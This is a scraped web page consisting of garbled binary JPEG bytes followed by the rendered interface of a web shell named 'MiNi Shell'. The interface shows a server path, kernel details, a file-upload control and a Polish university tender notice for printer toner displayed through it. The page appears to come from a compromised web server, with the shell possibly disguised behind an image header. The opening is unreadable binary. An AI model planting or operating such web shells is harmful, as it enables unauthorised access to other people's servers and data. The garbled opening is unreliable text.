JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221121/0044934701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> RZP/TP/120/I/22 Dostawa materiałów eksploatacyjnych<br/>do urządzeń drukujących i kopiujących przez okres 24 miesięcy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ŚLĄSKI UNIWERSYTET MEDYCZNY W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000289035</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Księcia Józefa Poniatowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-055</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@sum.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sum.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> RZP/TP/120/I/22 Dostawa materiałów eksploatacyjnych<br/>do urządzeń drukujących i kopiujących przez okres 24 miesięcy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9e74a6cb-6721-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00449347</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010888/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.12 Materiały eksploatacyjne, części zamienne do urządzeń biurowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sum.eb2b.com.pl/open-auctions.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sum.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej (zgodnie z art. 61 Pzp) wyłącznie za<br/>pośrednictwem Platformy w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz.<br/>344), pod adresem: https://sum.eb2b.com.pl, która spełnia wymagania opisane w art. 64 Pzp, w wierszu oznaczonym tytułem oraz<br/>znakiem niniejszego postępowania.<br/>2. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>1) w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym),<br/>2) w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>3. Zamawiający lub Wykonawca przekazując oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków<br/>komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, mogą zażądać od<br/>drugiej strony niezwłocznego potwierdzenia ich otrzymania.<br/>4. Komunikacja ustna dopuszczalna jest wyłącznie w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą<br/>ogłoszenia o zamówieniu lub dokumentów zamówienia, ofert, o ile jej treść jest udokumentowana (wymagana jest pisemna notatka z<br/>ustnej rozmowy).<br/>5. Niezwłocznie po otwarciu złożonych ofert, Zamawiający zamieści na Platformie przetargowej informacje o:<br/>1) nazwach albo imionach i nazwiskach oraz siedzibach lub miejscach prowadzonej działalności gospodarczej albo miejscach<br/>zamieszkania Wykonawców, których oferty zostały otwarte;<br/>2) cenach zawartych w ofertach.<br/>6. Informację o wyborze oferty najkorzystniejszej bądź o unieważnieniu postępowania Zamawiający zamieści na Platformie.<br/>7. Przyjmuje się, że dokument wysłany przy użyciu Platformy został doręczony Wykonawcy<br/>w sposób umożliwiający zapoznanie się z jego treścią, w dniu jego przekazania na Platformę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP/TP/120/I/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do urządzeń drukujących i kopiujących przez okres 24 miesięcy dla jednostek organizacyjnych Śląskiego Uniwersytetu Medycznego w Katowicach.<br/>Przedmiot zamówienia należy zrealizować w oparciu o założenia określone w opisie przedmiotu zamówienia zawartym w Specyfikacji asortymentowo-cenowej (załącznik nr 2), zgodne ze Szczegółowym opisem przedmiotu zamówienia (załącznik nr 3 do Umowy);<br/>Na dostarczone materiały Wykonawca udzieli 12-miesięcznej gwarancji jakości liczonej od daty należycie zrealizowanej dostawy cząstkowej. Gwarancja wygasa, jeżeli przed upływem jej okresu nastąpi wyczerpanie się środka drukującego. Jednocześnie Zamawiający wymaga, aby dostarczone materiały posiadały termin ważności nie krótszy niż 12 miesięcy od daty dostarczenia Zamawiającemu.<br/>Zamawiający wymaga dostarczenia materiałów eksploatacyjnych do urządzeń drukujących i kopiujących, będących materiałami referencyjnymi lub równoważnymi do wskazanych materiałów referencyjnych.<br/>Przez materiały referencyjne rozumie się materiały określone przez Zamawiającego za pomocą nazwy producenta, modelu, kodu produktu, symbolu lub innego oznaczenia wskazującego na producenta materiału. Ilekroć w Specyfikacji asortymentowo-cenowej, w Szczegółowym opisie przedmiotu zamówienia lub innych dokumentach zamówienia jest mowa o „oryginale” lub materiale/produkcie oryginalnym, należy przez to rozumieć materiał/produkt referencyjny – z zastrzeżeniem, że zarówno materiały/produkty referencyjne, jak i materiały/produkty równoważne muszą być materiałami/produktami oryginalnymi w tym sensie, że nie mogą być podróbkami wyrobów określonego producenta.<br/>Materiały (zarówno referencyjne jak i równoważne) muszą być dostarczane w opakowaniach zamkniętych hermetycznie przez producenta, muszą być fabrycznie nowe i posiadać na opakowaniu informację o dacie produkcji lub terminie ważności. Przez produkty nowe rozumie się materiały nowo wytworzone, posiadające nową obudowę, nowe dysze i nowy tusz, a także nowe bębny światłoczułe w nowych opakowaniach zamkniętych przez producenta (zapakowane w wewnętrzne, szczelne i hermetyczne opakowanie zabezpieczające przed kontaktem zewnętrznym), opatrzone w etykiety identyfikujące dany produkt (nazwa producenta, numer katalogowy, symbol i termin ważności). Za fabrycznie nowy nie uznaje się wyrobu, w którym pojemnik został jedynie wyczyszczony i ponownie napełniony. Materiały muszą, posiadać oznaczenie urządzeń, do których są przeznaczone (dedykowane) – przez co rozumie się informację o urządzeniach, w których można je stosować. Dostarczone materiały nie mogą być produktami regenerowanymi przerabianymi (podróbkami), ponownie napełnianymi lub wykonanymi z zastosowaniem używanych elementów – z zastrzeżeniem wyjątków wyraźnie wskazanych przez Zamawiającego. <br/>Zamawiający dopuszcza produkty refabrykowane w pozycjach:<br/>2, 3, 5, 16, 25, 29, 30, 31, 32, 33, 34, 45, 47, 48, 49, 50, 51, 53, 55, 74, 75, 76, 77 <br/>Tonery muszą być zabezpieczone przed wysypywaniem się proszku.<br/>Zamawiający wymaga, aby zaoferowane materiały były kompatybilne z urządzeniami, do których są przeznaczone. Wskaźnik zużycia tuszu lub tonera musi być prawidłowo wskazywany przez dane urządzenie. Zaoferowane materiały muszą posiadać elementy elektroniczne dające komunikaty o poziomie zużycia tuszu/tonera przy pracy w sieci. Ponadto urządzenia, o ile są fabrycznie wyposażone w rozwiązania umożliwiające kontrolę zastosowanych materiałów eksploatacyjnych, powinny sygnalizować informację o poziomie zużycia tuszu/tonera, np. za pomocą strony administracyjnej urządzenia (w przypadku drukarek sieciowych), na wyświetlaczu, na wydruku testowym lub stanu materiałów albo za pomocą zainstalowanego na komputerze oprogramowania diagnostycznego dla danego urządzenia. W przeciwnym przypadku materiał eksploatacyjny będzie uznany za niezgodny z Umową, powodujący nieprawidłowe działanie urządzenia, a w przypadku kilkukrotnego stwierdzenia takiej nieprawidłowości dla danego typu materiału, materiał zostanie przekazany producentowi urządzenia celem wykonania ekspertyzy legalności produktu.<br/>Wykonawca ponosi koszty transportu, koszty ubezpieczenia oraz opakowania materiałów na czas trwania transportu do miejsca dostarczenia.<br/>Kryteria równoważności (minimalne parametry równoważności):<br/>Zamawiający dopuszcza możliwość przedstawienia w ofercie asortymentu (materiałów) równoważnego, tj. innego niż podany „z nazwy” przez Zamawiającego w opisie przedmiotu zamówienia (innego niż materiały wyprodukowane przez producenta danego urządzenia) pod warunkiem, że:<br/>zastosowanie materiałów równoważnych nie narusza praw gwarancyjnych oraz przepisów prawnych dotyczących patentów (ochrona własności intelektualnej) producentów drukarek;<br/>materiały równoważne są fabrycznie nowe i spełniają wymagania określone powyżej, z zastrzeżeniem dopuszczonych wyjątków;<br/>materiały równoważne posiadają znak firmowy producenta oraz etykiety identyfikujące dany produkt;<br/>wydajność materiałów równoważnych (ilość uzyskanych kopii) nie może być mniejsza niż produktów referencyjnych;<br/>zastosowanie materiałów równoważnych nie może powodować utraty gwarancji producenta urządzeń;<br/>zastosowanie materiałów równoważnych nie może powodować ograniczeń funkcji i możliwości drukarki oraz jakości wydruku wyspecyfikowanych w warunkach technicznych producenta drukarki;<br/>zastosowanie materiałów równoważnych nie może ograniczać pełnej współpracy z programem drukarki monitorującym stan zasobników z tuszem lub tonerem;<br/>materiały równoważne muszą posiadać zabezpieczenia szczelności zbiorników z tonerem;<br/>toner w produktach równoważnych musi być gotowy do użycia po ściągnięciu zabezpieczenia;<br/>materiały równoważne muszą posiadać na opakowaniu indywidualny kod produktu oraz nazwę drukarki, do której są przeznaczone.<br/>Zamawiający informuje, że w dokumentach zawierających opis zamówienia wskazał produkty referencyjne <br/>w rozumieniu pkt 7 na str. 2, tym samym odwołał się do znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę. W związku z powyższym Zamawiający każdorazowo dopuszcza rozwiązania równoważne opisywanym, czemu w opisie przedmiotu zamówienia towarzyszy w odpowiednich miejscach dodanie wyrazów „lub równoważne”, „lub rozwiązanie równoważne” lub innego określenia informującego o dopuszczeniu rozwiązania równoważnego. Jednocześnie Zamawiający określił tzw. matrycę równoważności, tj. wskazał warunki, kryteria, mierniki, cechy, parametry, wyróżniki, efekty, funkcjonalności lub właściwości (rozumiane jako warunki, kryteria, mierniki, cechy, parametry, wyróżniki, efekty, funkcjonalności lub właściwości minimalne), które dane rozwiązanie równoważne musi spełniać lub zapewniać, aby zostało uznane przez Zamawiającego za rozwiązanie równoważne wobec wskazanego w opisie przedmiotu zamówienia rozwiązania referencyjnego.<br/>Wykonawca, który w pozycjach 119-122 lub 372-375 oferuje asortyment (materiały) równoważny, zobowiązany jest do przedłożenia wraz z ofertą nieodpłatnie materiałów eksploatacyjnych do urządzeń Lexmark CS417DN, Lexmark CS517DE, HP Color LaserJet 1600, takich jak zaoferowane w złożonych do postępowania dokumentach, w celu przeprowadzenia testu polegającego na jednorazowym (ciągłym) wydruku 100 (stu) kartek w kolorze w formacie A4 na urządzeniach Lexmark CS417DN, Lexmark CS517DE, HP Color LaserJet 1600 znajdujących się w dyspozycji Katedry Medycyny Sądowej i Toksykologii Sądowo-Lekarskiej Śląskiego Uniwersytetu Medycznego w Katowicach, 40-752 Katowice ul Medyków 18.<br/>Niepoprawny wydruk 100 kolejnych kartek A4 (spowodowany np. zgrzewaniem się proszku, powodujący zacięcie papieru, sklejanie kartek, niepełne/ nierówne zaczernienie kartki itp.) skutkować będzie odrzuceniem oferty. Po wykonaniu testów tonery zostaną zwrócone Wykonawcy. <br/>Wykonawca, jeżeli oferuje materiały równoważne, zobowiązany jest przedłożyć wraz z ofertą ich szczegółową specyfikację oraz wyniki testów wykonanych zgodnie z normami odpowiednimi dla danego urządzenia, np.: STMC lub równoważne, ISO/IEC 19752 lub równoważne, ISO/IEC 24711 lub równoważne, ISO/IEC 19798 lub równoważne, ISO/IEC 24712 lub równoważne z których winno wynikać, że zastosowany asortyment jest <br/>o takich samych lub lepszych parametrach technicznych (pojemność tuszu/tonera, wydajność) w odniesieniu <br/>do asortymentu określonego przez Zamawiającego w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30125110-5 - Toner do drukarek laserowych/faksów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> 1.	24 miesiące od dnia zawarcia umowy.<br/>2.	W przypadku niewyczerpania kwoty Umowy w terminie 24 miesięcy od daty zawarcia Zamawiający przewiduje możliwość przedłużenia czasu jej realizacji na dalszy czas oznaczony, nie dłużej jednak niż o 6 miesięcy, licząc od upływu terminu, na który zawarto Umowę.<br/>3.	Szczegółowe wymagania dotyczące terminów realizacji zawiera załącznik nr 5 do SIWZ – wzór umowy. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Specyfikacja asortymentowo- cenowa (załącznik nr 2) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadku wystąpienia przesłanek określonych w art. 455 ustawy, zgodnie z warunkami zawartymi w załączniku nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-29 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://sum.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-29 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com